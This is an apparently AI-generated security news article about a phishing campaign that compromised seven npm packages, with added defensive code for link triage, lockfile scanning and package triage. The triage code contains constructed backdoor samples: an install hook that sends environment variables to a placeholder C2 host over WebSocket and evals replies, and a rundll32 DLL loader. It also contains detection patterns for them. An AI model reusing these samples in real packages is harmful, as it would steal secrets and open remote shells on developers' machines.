Today's cybersecurity headlines are brought to you by ThreatPerspective


Ethical Hacking News

A Global Supply Chain Attack: 7 npm Packages Infected with Malware via Phishing Scam



A phishing campaign has led to seven npm packages being published with malware. The attackers sent project maintainers email messages impersonating npm that pointed at a typosquatted link, which harvested their credentials. With the stolen tokens, the attackers published malicious versions of the packages directly to the registry; the injected code is designed to evade detection and retrieves from an external server a stealer component capable of gathering sensitive data from web browsers.

  • A phishing campaign in July 2025 targeted npm project maintainers to steal their credentials and publish malicious versions of their packages.
  • Several high-profile projects were compromised, exposing the developers who install them to potential attacks.
  • Malware was injected into 7 npm packages, including eslint-config-prettier and eslint-plugin-prettier; it is designed to evade detection and deliver a stealer component.
  • The malware, dubbed Scavenger Loader, executes a DLL on Windows machines, giving the attackers code execution on the affected host.
  • Strong account security, such as two-factor authentication and scoped publishing tokens, is essential to prevent supply chain attacks of this kind.



    The software development and security communities have recently seen an attack that highlights the ever-present threat of supply chain compromise. In July 2025, a phishing campaign was launched against project maintainers on npm (Node Package Manager), the popular package registry, with the goal of stealing their credentials and using them to publish malicious versions of their packages directly to the registry.

    According to researchers at Socket, the attack involved email messages impersonating npm that tried to trick project maintainers into clicking a typosquatted link, which harvested their credentials. The phishing campaign was effective enough to compromise several high-profile projects, exposing the developers who depend on them to potential attacks.
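    One way to triage the links in such a message, as an added example that is not code from the article, from Socket, or from npm: compare each link's domain with the registry's real domain and flag near-misses and brand-as-subdomain tricks. The email body and the lookalike domains below are constructed for the demo (they use the reserved .invalid TLD and are not the campaign's actual domain), and treating the second-to-last label as the registrable domain is a simplification that ignores multi-part public suffixes.

```javascript
// Added example, not code from the article, from Socket, or from npm.
// Classify the domains of links found in a suspected "npm" email.
// Sample email and lookalike domains are constructed for the demo.

const LEGIT_DOMAIN = 'npmjs.com';
const BRAND_LABEL = 'npmjs';

// Classic single-row dynamic-programming edit distance; small distances from the
// brand label catch one- and two-character typosquats and transpositions.
function levenshtein(a, b) {
  const row = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = row[0];
    row[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = row[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      row[j] = Math.min(above + 1, row[j - 1] + 1, diag + cost);
      diag = above;
    }
  }
  return row[b.length];
}

// Assumption: the second-to-last label is the registrable name (no co.uk-style
// public suffixes in the input). Returns 'legitimate', 'lookalike' or 'unrelated'.
function classifyHost(hostname) {
  const host = hostname.toLowerCase().replace(/\.$/, '');
  const labels = host.split('.');
  if (labels.length < 2) return 'unrelated';
  const registrable = labels.slice(-2).join('.');
  if (registrable === LEGIT_DOMAIN) return 'legitimate';
  // Brand used as a subdomain or embedded in another label,
  // e.g. npmjs.com.account-verify.invalid or login-npmjs.invalid
  if (host.includes(BRAND_LABEL)) return 'lookalike';
  // Near-miss spellings of the brand label in the registrable name
  if (levenshtein(labels[labels.length - 2], BRAND_LABEL) <= 2) return 'lookalike';
  return 'unrelated';
}

// Pull http(s) links out of a plain-text body; URL is a Node/browser global.
function extractLinks(body) {
  const found = body.match(/https?:\/\/[^\s<>"')\]]+/g) || [];
  return found.map((raw) => {
    const url = raw.replace(/[.,;:!?]+$/, ''); // drop sentence punctuation glued to the link
    try {
      const u = new URL(url);
      return { url, host: u.hostname, verdict: classifyHost(u.hostname) };
    } catch {
      return { url, host: null, verdict: 'unparseable' };
    }
  });
}

function triageEmail(body) {
  const links = extractLinks(body);
  const suspicious = links.filter((l) => l.verdict !== 'legitimate' && l.verdict !== 'unrelated');
  return { links, suspicious, flagged: suspicious.length > 0 };
}

// Constructed sample in the shape of the lure the article describes: a real
// registry link sits beside two lookalikes and one unrelated link.
const SAMPLE_EMAIL = `
Subject: Please verify your npm account

Your account requires verification. Sign in here to avoid suspension:
https://npmjs.com.account-verify.invalid/login

You can review your tokens at https://www.npmjs.com/settings/tokens
Questions? Visit https://nmpjs.invalid/support or https://github.com/npm/cli
`;

const result = triageEmail(SAMPLE_EMAIL);
for (const l of result.links) console.log(`${l.verdict.padEnd(11)} ${l.host}`);
```

    The edit-distance threshold is deliberately loose (a registrable name such as npm.io would also be flagged), which is the right trade-off for a triage step whose output a human reviews before clicking anything.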

    Malware Injected into 7 npm Packages After Maintainer Tokens Stolen in Phishing Attack

    The affected packages and their rogue versions are:

  • eslint-config-prettier (versions 8.10.1, 9.1.1, 10.1.6, and 10.1.7)
  • eslint-plugin-prettier (versions 4.2.2 and 4.2.3)
  • synckit (version 0.11.9)
  • @pkgr/core (version 0.2.8)
  • napi-postinstall (version 0.3.1)
  • got-fetch (versions 5.1.11 and 5.1.12)
  • is (versions 3.3.1 and 5.0.0)

    These versions carry malware designed to evade detection and to deliver, from an external server, a stealer component codenamed Scavenger Stealer that can gather sensitive data from web browsers.
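    As an added example, not code from the article or from any affected project, the following script checks a package-lock.json for exactly those versions, including transitive copies nested under other packages, for both the current path-keyed lockfile format (lockfileVersion 2 and 3) and the older nested format (lockfileVersion 1). The lockfiles it runs against are constructed for the demo; the version list is the one given above.

```javascript
// Added example, not from the article or from any affected project: check a
// package-lock.json for the rogue versions listed in the advisory.
// The sample lockfiles below are constructed for the demo.

const COMPROMISED = {
  'eslint-config-prettier': ['8.10.1', '9.1.1', '10.1.6', '10.1.7'],
  'eslint-plugin-prettier': ['4.2.2', '4.2.3'],
  synckit: ['0.11.9'],
  '@pkgr/core': ['0.2.8'],
  'napi-postinstall': ['0.3.1'],
  'got-fetch': ['5.1.11', '5.1.12'],
  is: ['3.3.1', '5.0.0'],
};

function isCompromised(name, version) {
  const bad = COMPROMISED[name];
  return Boolean(bad && version && bad.includes(version));
}

// lockfileVersion 2 and 3 key every installed package by its on-disk path, so a
// transitive copy shows up as "node_modules/x/node_modules/is". The name is the
// remainder after the last "node_modules/", which keeps a scope such as @pkgr/.
function nameFromLockPath(lockPath) {
  const idx = lockPath.lastIndexOf('node_modules/');
  return idx === -1 ? null : lockPath.slice(idx + 'node_modules/'.length);
}

// lockfileVersion 1 nests transitive dependencies under each entry instead.
function walkV1(deps, parentPath, hits) {
  for (const [name, entry] of Object.entries(deps || {})) {
    const path = `${parentPath}node_modules/${name}`;
    if (isCompromised(name, entry.version)) hits.push({ name, version: entry.version, path });
    walkV1(entry.dependencies, `${path}/`, hits);
  }
}

function findCompromised(lockfile) {
  const hits = [];
  if (lockfile.packages) {
    for (const [path, entry] of Object.entries(lockfile.packages)) {
      const name = nameFromLockPath(path); // "" is the root project, skipped
      if (name && isCompromised(name, entry.version)) hits.push({ name, version: entry.version, path });
    }
  } else {
    walkV1(lockfile.dependencies, '', hits);
  }
  return hits.sort((a, b) => (a.path < b.path ? -1 : a.path > b.path ? 1 : 0));
}

function scanLockfileText(text) {
  return findCompromised(JSON.parse(text));
}

// Constructed v3 lockfile: one direct hit, a clean top-level "is" shadowed by a
// nested rogue copy, and a nested rogue @pkgr/core under synckit.
const SAMPLE_LOCKFILE = JSON.stringify({
  name: 'demo-app',
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/eslint-config-prettier': { version: '10.1.7' },
    'node_modules/eslint-plugin-prettier': { version: '4.2.1' },
    'node_modules/is': { version: '3.3.0' },
    'node_modules/some-tool': { version: '2.0.0' },
    'node_modules/some-tool/node_modules/is': { version: '5.0.0' },
    'node_modules/synckit': { version: '0.11.8' },
    'node_modules/@pkgr/core': { version: '0.2.7' },
    'node_modules/synckit/node_modules/@pkgr/core': { version: '0.2.8' },
  },
});

// Constructed v1 lockfile with the same kind of nested hit.
const SAMPLE_LOCKFILE_V1 = JSON.stringify({
  lockfileVersion: 1,
  dependencies: {
    'got-fetch': { version: '5.1.12', dependencies: { is: { version: '3.3.1' } } },
    'napi-postinstall': { version: '0.3.0' },
  },
});

for (const h of scanLockfileText(SAMPLE_LOCKFILE)) console.log(`${h.name}@${h.version} at ${h.path}`);
```

    To run it against a real project, replace the constructed sample with fs.readFileSync('package-lock.json', 'utf8'). A hit means the version should be pinned away or removed and any host that ran npm install with that lockfile treated as potentially exposed, since the payload runs at install time.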

    The loader, dubbed Scavenger Loader, executes a DLL on Windows machines, giving the attackers code execution on the affected host. Not every rogue version takes that route, however: the compromised versions of is carry a separate payload written wholly in JavaScript, so it runs on Windows, Linux, and macOS alike.

    That module collects system information and environment variables and exfiltrates them over a WebSocket connection. Every message received over the socket is then treated as executable JavaScript, which gives the attackers an instant, interactive remote shell running with the privileges of the host process and, with them, unrestricted file system and network access. Deploying several payload families in this way lets the campaign maximize its reach.
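    A static triage pass for those traits, as an added example that is not the malware's code and not code from the article or any affected project: it looks at a package's lifecycle scripts and JavaScript sources for an install-time hook, environment harvesting, a WebSocket client that executes what it receives, and a DLL launched through rundll32. The sample packages are constructed stand-ins (the endpoint they reference uses the reserved .invalid TLD), and the signal names and scoring rules are the example's own.

```javascript
// Added example, not the malware's code and not from any affected project: a
// static triage pass over a package's package.json and JavaScript files for
// the traits the article describes. All sample packages are constructed.

const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Each signal alone is common in legitimate code; the combinations scored in
// triagePackage are what make a package worth pulling apart by hand.
const SIGNALS = {
  websocket: /\bnew\s+WebSocket\s*\(|require\(\s*['"]ws['"]\s*\)/,
  dynamicEval: /\beval\s*\(|\bnew\s+Function\s*\(|\bvm\.runIn(ThisContext|NewContext)\s*\(/,
  envHarvest: /\bprocess\.env\b|\bos\.(hostname|userInfo|platform|networkInterfaces)\s*\(/,
  nativeLoader: /\brundll32\b|\.dll\b/i,
};

// Lifecycle hooks that npm runs automatically at install time.
function installHooks(pkgJson) {
  const scripts = pkgJson.scripts || {};
  return LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === 'string' && scripts[h].trim() !== '');
}

function sourceSignals(source) {
  return Object.keys(SIGNALS).filter((k) => SIGNALS[k].test(source));
}

// files: { 'install.js': '<source text>', ... }
// Severity: 'high' for a socket-fed eval loop anywhere, or an install hook paired
// with a native DLL launch; 'medium' for an install hook plus any other signal;
// 'low' for a lone hook or lone signal; 'none' otherwise.
function triagePackage(pkgJson, files) {
  const hooks = installHooks(pkgJson);
  const perFile = {};
  const all = new Set();
  for (const [name, src] of Object.entries(files)) {
    const sig = sourceSignals(src);
    if (sig.length) perFile[name] = sig;
    sig.forEach((s) => all.add(s));
  }
  const remoteShell = all.has('websocket') && all.has('dynamicEval');
  let severity = 'none';
  if (remoteShell || (hooks.length && all.has('nativeLoader'))) severity = 'high';
  else if (hooks.length && all.size) severity = 'medium';
  else if (hooks.length || all.size) severity = 'low';
  return { hooks, signals: perFile, severity };
}

// Constructed benign package: no lifecycle hook, no suspicious calls.
const BENIGN = {
  pkg: { name: 'demo-is-number', version: '1.0.0', scripts: { test: 'node test.js' } },
  files: { 'index.js': 'module.exports = (x) => typeof x === "number" && !Number.isNaN(x);\n' },
};

// Constructed stand-in for the pure-JavaScript loader the article describes:
// runs from a postinstall hook, ships host details, then evals every message.
const BACKDOOR = {
  pkg: { name: 'demo-backdoor', version: '1.0.1', scripts: { postinstall: 'node install.js' } },
  files: {
    'index.js': 'module.exports = () => true;\n',
    'install.js': [
      "const os = require('os');",
      "const ws = new WebSocket('wss://c2.example.invalid/'); // constructed endpoint",
      'ws.onopen = () => ws.send(JSON.stringify({ host: os.hostname(), env: process.env }));',
      'ws.onmessage = (m) => eval(String(m.data));',
    ].join('\n'),
  },
};

// Constructed stand-in for the Windows-only DLL loader the article describes.
const DLL_LOADER = {
  pkg: { name: 'demo-dll', version: '2.0.0', scripts: { install: 'node install.js' } },
  files: {
    'install.js': [
      "if (process.platform === 'win32') {",
      "  require('child_process').execSync('rundll32 loader.dll,entry');",
      '}',
    ].join('\n'),
  },
};

for (const [label, s] of Object.entries({ BENIGN, BACKDOOR, DLL_LOADER })) {
  console.log(label, JSON.stringify(triagePackage(s.pkg, s.files)));
}
```

    A pass like this belongs in CI before a lockfile update is merged, run over the unpacked tarball of every newly added or bumped package; it will not catch obfuscated payloads, so a 'medium' or 'high' result is a prompt for manual review, not a verdict.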

    The attack highlights the importance of strong account security for maintainers, including two-factor authentication and the use of scoped publishing tokens instead of passwords. It is also a reminder to developers to regularly audit their installed packages for signs of compromise and to act swiftly when a dependency turns out to be affected.

    The attack coincides with an unrelated campaign that has flooded npm with 28 packages carrying protestware: code that disables mouse-based interaction on websites under specific domains, such as Russian or Belarusian sites, and plays the Ukrainian national anthem on a loop. The code is gated on the visitor's browser language being set to Russian and fires only on repeat visits rather than the first, so casual first-time visitors are not affected.

    This campaign underscores the risk of nested dependencies, whose behaviour may not manifest until days or weeks after installation. It also shows why developers need to keep monitoring their projects' dependencies and be aware that another developer's choices can have consequences for their own users.

    In addition to these npm packages, the Arch Linux team has recently removed three malicious AUR (Arch User Repository) packages that were uploaded to the repository and harbored hidden functionality to install a remote access trojan called Chaos RAT. The affected packages were published by a user named "danikpapas" on July 16, 2025.

    The attack against npm has sent shockwaves through the software development community, underscoring the ever-present danger of supply chain attacks and the importance of robust security measures to protect developer projects.

    Related Information:
  • https://www.ethicalhackingnews.com/articles/A-Global-Supply-Chain-Attack-7-npm-Packages-Infected-with-Malware-via-Phishing-Scam-ehn.shtml

  • https://thehackernews.com/2025/07/malware-injected-into-6-npm-packages.html


  • Published: Wed Jul 23 07:48:33 2025 by llama3.2 3B Q4_K_M
    © Ethical Hacking News . All rights reserved.
